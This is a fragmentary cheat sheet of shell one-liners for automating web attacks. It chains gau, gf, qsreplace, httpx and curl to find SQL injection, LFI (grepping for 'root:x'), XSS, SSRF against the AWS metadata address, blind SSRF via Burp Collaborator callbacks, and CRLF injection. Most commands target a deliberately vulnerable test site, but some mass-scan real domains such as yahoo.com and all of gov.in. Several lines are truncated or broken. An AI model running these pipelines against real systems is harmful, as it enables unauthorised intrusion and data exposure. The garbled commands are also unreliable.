AUTOMATE WEB APPLICATION ATTACKS WITH SCRIPTS
Error based sqli
Target: http://TARGET.com/artists.php?artist=1
Command: curl -sk "http://testphp.vulnweb.com/artists.php?artist=1" | grep -q "WHAT KIND for error for sql injection"
Automation:
gau -subs testphp.vulnweb.com | gf sqli | httpx | qsreplace "1'" | xargs -I{} sh -c 'curl -sk "{}" 2>&1 | grep -q "mysql_fetch_array" && echo "
FULL automation:
for sqli
Time based: payload used: ' or sleep(5)#
Normal testing: time curl -s -I "http://testphp.vulnweb.com/artists.php?artist=1" time curl -s -I "http://testphp.vulnweb.com/artists.php?artist=1 or sleep(10)#"
Automation:
for sqli in
LFI:
cat /payloads/pathtravers.txt | parallel -j 6 'curl -sk "http://testphp.vulnweb.com/showimage.php?file={}" 2>&1 | grep -q "root:x" && echo "VULN! LFI {}"'
for lfi in
XSS:
grep "?" | sort -u | grep "=" | qsreplace "" | xargs -I % sh -c 'curl -sk "%" 2>&1 | grep -q "alert(1)" --color && echo "
cat testparam.txt | parallel -j 5 echo "https://xss-game.appspot.com/level1/frame?{}" | qsreplace "" | xargs -I % sh -c 'curl -sk "%" 2>&1 | grep -q "alert(1)" --color && echo "
for xss in
SSRF: gau -subs testphp.vulnweb.com | grep "=" | qsreplace "http://169.254.169.254/latest/meta-data/hostname" | xargs -I% sh -c 'curl -sk "%" 2>&1 | grep "compute.internal" && echo " ssrf aws metadata %"'
BLIND ssrf:
gau -subs testphp.vulnweb.com | gf ssrf | qsreplace "http://burpcollaborator.net" | httpx -silent -proxy http://127.0.0.1:8080
subfinder -d yahoo.com -silent | httpx -silent -proxy http://127.0.0.1:8080 -H "Referer: http://burpcollaborator.net"
Command:
curl -sk "http://testphp.vulnweb.com/showimage.php?file=http://burpcollab.net" |httpx
Automation: gau -subs testphp.vulnweb.com | grep "=" | httpx -silent | qsreplace "http://burpcollab.net" | xargs -I{} sh -c 'curl -sk "{}"
FULL automation:
for burpcoll
gau -subs gov.in | grep "=" | gf ssrf | httpx -silent | qsreplace "http://burpcollab.net" | parallel -j 30 curl -sk "{}"
Blind SSRF by header: Target: testphp.vulnweb.com
Command: FUll Automation: subfinder -d testphp.vulnweb.com -silent | httpx -H "Referer: http://burpcollab.net"
SSRF to access metadata Automation; gau -subs testphp.vulnweb.com | grep "=" | qsreplace "http://169.254.169.254/latest/meta-data/hostname" | xargs -I% sh -c 'curl -sk "%" 2>&1 | grep "compute.internal" && echo " ssrf aws metadata %"'
CRLF
for crlf in
AUTOMATE BROKEN LINK HIJACKING**
INSTALL blc
subfinder -dL -silent | httpx -silent | parllel -j 10 blc {} | grep "broken"
for crlf in
echo "http://testme.yahoo.com?qtest=hell" | qsreplace "%0dSet-Cookie:test=test" | xargs -I% sh -c 'curl -sk -I % | grep "test=test"'